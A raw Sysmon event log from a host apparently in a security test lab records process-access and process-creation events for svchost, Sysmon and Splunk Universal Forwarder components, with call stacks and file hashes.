13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-910C-6005-7401-00000000A301}2824C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-910C-6005-7401-00000000A301}2824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.596{59A5CD1D-910C-6005-7401-00000000A301}2824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.219{59A5CD1D-910C-6005-7301-00000000A301}22323048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-910C-6005-7301-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-910C-6005-7301-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-910C-6005-7301-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.079{59A5CD1D-910C-6005-7301-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-910E-6005-7501-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 